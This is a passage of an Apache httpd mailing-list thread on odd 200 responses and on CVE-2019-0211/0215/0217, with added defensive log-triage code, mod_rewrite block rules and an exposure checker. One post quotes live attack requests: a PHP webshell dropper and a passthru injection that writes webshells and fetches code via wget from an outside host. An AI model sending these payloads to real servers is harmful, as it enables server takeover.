Strange responses


Strange responses

kohmoto
Hi,

I operate my site with httpd 2.4.39 with the ssl option.

Yesterday, strange responses were observed.

My site received the following abuse requests.  Except for the following
requests, httpd returns a 404 error to obvious abuse requests. However,
for the following two queries, httpd seemed to return a message with
200 status when it receives 'GET /'.  I expect httpd should return a
404 error.

Case 1:
GET
/?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUMENT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B
HTTP/1.1

Case 2:
POST
/?q=user%2Fpassword&name%5B%23post_render%5D%5B%5D=passthru&name%5B%23type%5D=markup&name%5B%23markup%5D=echo+%27Vuln%21%21+patch+it+Now%21%27+%3E+vuln.htm%3B+echo+%27Vuln%21%21%3C%3Fphp+%40eval%28%24_POST%5B%27pass%27%5D%29+%3F%3E%27%3E+sites%2Fdefault%2Ffiles%2Fvuln.php%3B+echo+%27Vuln%21%21%3C%3Fphp+%40eval%28%24_POST%5B%27pass%27%5D%29+%3F%3E%27%3E+vuln.php%3B+cd+sites%2Fdefault%2Ffiles%2F%3B+echo+%27AddType+application%2Fx-httpd-php+.jpg%27+%3E+.htaccess%3B+wget+%27http%3A%2F%2F40k.waszmann.de%2FDeutsch%2Fimages%2Fup.php%27
HTTP/1.1

It would be very appreciated if someone could advise me.

Thank you.

Yours truly,

Kazuhiko Kohmoto



---------------------------------------------------------------------
To unsubscribe, e-mail: [hidden email]
For additional commands, e-mail: [hidden email]
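What the two query strings above actually carry is easier to see once they are percent-decoded. The Python below is an added example, not code from the post or from httpd: it embeds the two request lines in constructed access-log lines (made-up client address and timestamps), decodes the query strings, unpacks the base64_decode() argument one layer down, and flags the usual markers of a PHP webshell dropper. On this input the first request resolves to a file_put_contents() call that writes `<?php eval($_POST[1]);?>` to webconfig.txt.php under the document root, and the second passes `passthru` as a form-callback name followed by a shell command that drops vuln.php and an .htaccess line mapping .jpg to PHP. Neither payload does anything unless a PHP application behind '/' evaluates it.

```python
import base64
import re
from urllib.parse import parse_qsl, urlsplit

# Access-log lines constructed for this example (Common Log Format; the
# TEST-NET-3 address and the timestamps are made up). The first two request
# lines are the ones quoted in the post; the third is a benign control.
SAMPLE_LOG = r"""
203.0.113.5 - - [04/Apr/2019:10:21:07 +0900] "GET /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUMENT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B HTTP/1.1" 200 3214
203.0.113.5 - - [04/Apr/2019:10:21:09 +0900] "POST /?q=user%2Fpassword&name%5B%23post_render%5D%5B%5D=passthru&name%5B%23type%5D=markup&name%5B%23markup%5D=echo+%27Vuln%21%21+patch+it+Now%21%27+%3E+vuln.htm%3B+echo+%27Vuln%21%21%3C%3Fphp+%40eval%28%24_POST%5B%27pass%27%5D%29+%3F%3E%27%3E+sites%2Fdefault%2Ffiles%2Fvuln.php%3B+echo+%27Vuln%21%21%3C%3Fphp+%40eval%28%24_POST%5B%27pass%27%5D%29+%3F%3E%27%3E+vuln.php%3B+cd+sites%2Fdefault%2Ffiles%2F%3B+echo+%27AddType+application%2Fx-httpd-php+.jpg%27+%3E+.htaccess%3B+wget+%27http%3A%2F%2F40k.waszmann.de%2FDeutsch%2Fimages%2Fup.php%27 HTTP/1.1" 200 3214
203.0.113.5 - - [04/Apr/2019:10:21:10 +0900] "GET /index.html HTTP/1.1" 200 1024
"""

LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>\S+)" (?P<status>\d{3}) \S+'
)

# Markers of a PHP webshell dropper / command injection in a query string.
INDICATORS = [
    ("php-open-tag", re.compile(r"<\?php", re.I)),
    ("php-dangerous-call", re.compile(
        r"\b(?:eval|assert|passthru|system|exec|shell_exec|popen|proc_open|"
        r"file_put_contents|base64_decode)\s*\(", re.I)),
    ("php-superglobal", re.compile(r"\$_(?:POST|GET|REQUEST|COOKIE|SERVER)\s*\[", re.I)),
    ("htaccess-php-handler", re.compile(r"AddType\s+application/x-httpd-php", re.I)),
    ("remote-fetch", re.compile(r"\b(?:wget|curl)\s+['\"]?https?://", re.I)),
]
# A bare function name as a parameter value is the shape of a callback injection.
CALLBACK_NAMES = {"passthru", "system", "exec", "shell_exec", "eval", "assert"}
B64_ARG = re.compile(r"base64_decode\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")


def parse_log_line(line):
    """Split a Common/Combined Log Format line into its request parts."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m["target"])
    return {"host": m["host"], "method": m["method"], "path": parts.path,
            "query": parts.query, "status": int(m["status"])}


def decoded_base64_payloads(query):
    """Plaintext of every base64_decode('...') argument found in the query."""
    out = []
    for _, value in parse_qsl(query, keep_blank_values=True):
        for blob in B64_ARG.findall(value):
            try:
                out.append(base64.b64decode(blob, validate=True).decode("utf-8", "replace"))
            except ValueError:  # binascii.Error is a ValueError subclass
                continue
    return out


def find_indicators(query):
    """Sorted names of the indicators that fire on the percent-decoded query."""
    hits = set()
    texts = []
    for key, value in parse_qsl(query, keep_blank_values=True):
        texts += [key, value]
        if value.strip().lower() in CALLBACK_NAMES:
            hits.add("php-callback-name")
    texts += decoded_base64_payloads(query)  # scan one layer of base64 as well
    for text in texts:
        for name, rx in INDICATORS:
            if rx.search(text):
                hits.add(name)
    return sorted(hits)


def triage(log_text):
    """Return only the log entries whose query string carries indicators."""
    flagged = []
    for line in log_text.strip().splitlines():
        entry = parse_log_line(line)
        if entry is None:
            continue
        entry["indicators"] = find_indicators(entry["query"])
        if entry["indicators"]:
            flagged.append(entry)
    return flagged


if __name__ == "__main__":
    for e in triage(SAMPLE_LOG):
        print(e["method"], e["path"], e["status"], ", ".join(e["indicators"]))
    for payload in decoded_base64_payloads(parse_log_line(SAMPLE_LOG.strip().splitlines()[0])["query"]):
        print("base64 payload:", payload)
```

Run against a real access log, the same loop reads the file line by line; the indicator list is deliberately narrow so that it explains what it flagged rather than scoring every odd query string.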


CVE-2019-0211/0215/0217

sunhux G

Are the above CVEs affecting Apache httpd (i.e. web servers) 2.4.x only,
and are other lower versions (e.g. our Solaris 10's Apache/2.0.63) not
affected?

Can someone point me to where to get the patches for RHEL7/RHEL6
in the Red Hat support portal or anywhere else that's reliable?

Sun

Re: CVE-2019-0211/0215/0217

@lbutlr
On 6 Apr 2019, at 08:59, Sunhux G <[hidden email]> wrote:
> Are the above CVEs affecting Apache httpd (i.e. web servers) 2.4.x only,
> and are other lower versions (e.g. our Solaris 10's Apache/2.0.63) not
> affected?

The CVE lists, explicitly, what versions are affected.

"The flaw was discovered by Charles Fol and impacts all Apache HTTP Server releases from 2.4.17 to 2.4.38. The issue has been addressed with the release of Apache httpd 2.4.39"

Also, as you should be aware, Apache 2.0 and Apache 2.2 are both end-of-life and no longer supported.


--
Love is like oxygen / You get too much / you get too high / Not enough
and you're gonna die



Re: CVE-2019-0211/0215/0217

sunhux G
In reply to this post by sunhux G

Also,
can we safely say CVE-2019-0217 & CVE-2019-0215 affect "2.4.17 through 2.4.38 with MPM event, worker or prefork" only (just like CVE-2019-0211)?

How do I check if we have "MPM event, worker or prefork" in our Apache?


On Sat, Apr 6, 2019 at 10:59 PM Sunhux G <[hidden email]> wrote:

Re: CVE-2019-0211/0215/0217

Dan Ehrlich-2
I've seen a few CVEs now that are low level but pretty much affect every version from 2.4.30ish and back.

The default Apache versions in the Debian and Ubuntu repos are 2.4.25 and 2.4.29 respectively.

QUESTIONS:
1. Any way to move the versions up (assuming I didn't miss something)?
2. Happy to help / take on task if someone can point me in the right direction 


On Apr 6, 2019, at 11:14 PM, Sunhux G <[hidden email]> wrote:

Re: CVE-2019-0211/0215/0217

Yehuda Katz
The distributions like RedHat, Debian, Ubuntu, etc. lock the version of their software packages when they release any specific version of their OS, and they are responsible for backporting any security or bug fixes.

For example, you can see Debian's tracker here:  https://security-tracker.debian.org/tracker/CVE-2019-0211
They append their own release number to the end of the HTTPD version to show that they fixed the bug (2.4.25-3+deb9u6 to deb9u7).
Ubuntu says they fixed the issues in 2.4.29-1ubuntu4.6

- Y

On Sun, Apr 7, 2019 at 3:43 AM Dan Ehrlich <[hidden email]> wrote:

Re: Strange responses

William A Rowe Jr
In reply to this post by kohmoto
The requests processed asked to GET and POST to / in HTTP/1.1 protocol.

Why do you suppose your server should reject a request for the content '/'? Seems like a very strange concern.

Depending on the handler charged with processing '/', the remaining '?' query args are interpreted, or generally ignored.


On Fri, Apr 5, 2019, 23:15 kohmoto <[hidden email]> wrote:
---------------------------------------------------------------------
To unsubscribe, e-mail: [hidden email]
For additional commands, e-mail: [hidden email]
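Rowe's point is that '/' exists, so a request for it is answered 200 whatever the query string says; the status code only matters if the handler behind '/' (a PHP application, say) actually executes what the query carries. If you still want httpd to answer these probes itself rather than pass them on, mod_rewrite can test the query string. This is an added example, not configuration from the thread: it assumes httpd 2.4 with mod_rewrite loaded, the patterns are illustrative, and unescape() percent-decodes the query string before matching so that `%3C%3Fphp` and `<?php` are treated alike (a literal `+` is left as is, which is why the patterns accept either a space or a `+`).

```apache
# Added example (not from the thread): answer 404 to requests whose query
# string carries a PHP or shell payload. Assumes mod_rewrite is loaded and
# httpd 2.4 (RewriteCond expr and the unescape() function are 2.4 features).
# Patterns are illustrative; check with `httpd -t` and a few benign requests
# before relying on them.
RewriteEngine On

# PHP source, dangerous calls, or superglobals anywhere in the query
RewriteCond expr "unescape(%{QUERY_STRING}) =~ /<[?]php|base64_decode[(]|file_put_contents[(]|eval[(]|[$]_(POST|GET|REQUEST)[[]/i" [OR]
# a bare callback name as a parameter value, e.g. name[#post_render][]=passthru
RewriteCond expr "unescape(%{QUERY_STRING}) =~ /(^|&)[^=&]*=(passthru|system|exec|shell_exec|eval)(&|$)/i" [OR]
# writing a handler mapping into .htaccess, or fetching a second stage
RewriteCond expr "unescape(%{QUERY_STRING}) =~ /AddType[ +]+application.x-httpd-php|wget[ +]|curl[ +]/i"
# R=404 with '-' as substitution: no redirect, httpd sends 404 directly ([F] would send 403)
RewriteRule ^ - [R=404,L]
```

Treat this as a band-aid. Whether httpd says 200 or 404 changes nothing about what the application behind '/' did with the request; the useful follow-up is to look for the files the payloads try to write (webconfig.txt.php under the document root, vuln.php and an .htaccess with an AddType line under sites/default/files/) and for any PHP interpreter that could have run them.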


Re: CVE-2019-0211/0215/0217

William A Rowe Jr
In reply to this post by @lbutlr
In general, problems which stretch back to the initial 2.4.1 or commonly deployed 2.4.3 might also affect 2.2.x or 2.0.x. As users have had almost a decade to adjust and these versions are EOL, the project seems unlikely to care, and notices are everywhere that the old flavors are no longer evaluated for the impact of any defects, security or otherwise. Vendors who support older flavors are on their own to make such evaluations themselves.

And in general, when a later, specific flavor of 2.4.x (e.g. 2.4.17) is cited as the first version impacted, that version is expected to be the one where a defect was introduced.

There is the edge case that a problem could exist, then be fixed or masked sometime before 2.4.1, and later be reintroduced during 2.4.x, but the rules above should generally apply. 

On Sun, Apr 7, 2019, 02:38 @lbutlr <[hidden email]> wrote:
---------------------------------------------------------------------
To unsubscribe, e-mail: [hidden email]
For additional commands, e-mail: [hidden email]
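Sunhux asked how to tell which MPM is in use, and Yehuda's reply explains why the upstream version number alone misleads on a distro package. `httpd -V` (Red Hat; `apache2ctl -V` on Debian/Ubuntu) prints a `Server MPM:` line next to the version, and `httpd -M` lists the loaded modules, where the MPM shows up as mpm_event_module, mpm_worker_module or mpm_prefork_module. The Python below is an added example, not from the thread or the httpd project: it parses a constructed sample of that output, applies the range given above for CVE-2019-0211 (2.4.17 through 2.4.38 with the event, worker or prefork MPM), and then lets a distro package version such as Debian's 2.4.25-3+deb9u7 or Ubuntu's 2.4.29-1ubuntu4.6 override the verdict, since those carry the backported fix although their upstream number is below 2.4.39. Versions before 2.4 get Rowe's answer rather than a range check: those branches are end-of-life and no longer evaluated. The version comparison is a simplified dpkg-style key (no epoch or '~' handling); use `dpkg --compare-versions` or `rpmdev-vercmp` for real checks. RHEL fixed package versions are not given in the thread and are not assumed here.

```python
import re

# Constructed sample of `httpd -V` / `apache2ctl -V` output; not captured
# from any real host.
SAMPLE_HTTPD_V = """\
Server version: Apache/2.4.29 (Ubuntu)
Server built:   2019-04-03T13:22:37
Server's Module Magic Number: 20120211:68
Architecture:   64-bit
Server MPM:     event
  threaded:     yes (fixed thread count)
    forked:     yes (variable process count)
"""

# Affected range for CVE-2019-0211 as stated in the thread.
AFFECTED_FIRST, AFFECTED_LAST = (2, 4, 17), (2, 4, 38)
AFFECTED_MPMS = {"event", "worker", "prefork"}


def parse_httpd_v(text):
    """Return (version tuple, lower-cased MPM name) from `httpd -V` output.
    Either element is None when its line is missing."""
    version = mpm = None
    for line in text.splitlines():
        m = re.match(r"Server version:\s+Apache/(\d+)\.(\d+)\.(\d+)", line)
        if m:
            version = tuple(int(x) for x in m.groups())
        m = re.match(r"Server MPM:\s+(\S+)", line)
        if m:
            mpm = m.group(1).lower()
    return version, mpm


def _version_key(v):
    """Simplified dpkg-style sort key: alternating numeric / non-numeric runs,
    numbers compared numerically so deb9u10 > deb9u9. Does not implement
    dpkg's epoch or '~' rules (assumption: good enough for fixed-version
    strings like 2.4.25-3+deb9u7)."""
    return [(0, int(p)) if p.isdigit() else (1, p) for p in re.findall(r"\d+|\D+", v)]


def version_lt(a, b):
    """True when package version a sorts before b."""
    return _version_key(a) < _version_key(b)


def assess(httpd_v_output, installed_pkg=None, fixed_pkg=None):
    """Verdict for CVE-2019-0211 on one host.

    installed_pkg / fixed_pkg are distro package version strings (for example
    from `dpkg -s apache2` and the distro's security tracker). When both are
    given, a backported fix overrides the upstream version check."""
    version, mpm = parse_httpd_v(httpd_v_output)
    if version is None or mpm is None:
        return "unknown"
    if version < (2, 4, 0):
        return "eol-not-evaluated"   # 2.0.x / 2.2.x are no longer assessed upstream
    if not (AFFECTED_FIRST <= version <= AFFECTED_LAST and mpm in AFFECTED_MPMS):
        return "not-affected"
    if installed_pkg and fixed_pkg and not version_lt(installed_pkg, fixed_pkg):
        return "patched-by-distro"
    return "affected"


if __name__ == "__main__":
    print(parse_httpd_v(SAMPLE_HTTPD_V))
    print("upstream only:", assess(SAMPLE_HTTPD_V))
    print("with Ubuntu fix:", assess(SAMPLE_HTTPD_V, "2.4.29-1ubuntu4.6", "2.4.29-1ubuntu4.6"))
```

On a live host, feed `subprocess.run(["httpd", "-V"], capture_output=True, text=True).stdout` to assess() together with the installed package version; the point of the second argument pair is that "2.4.29" in the banner is not by itself evidence of exposure once the distro has shipped its backport.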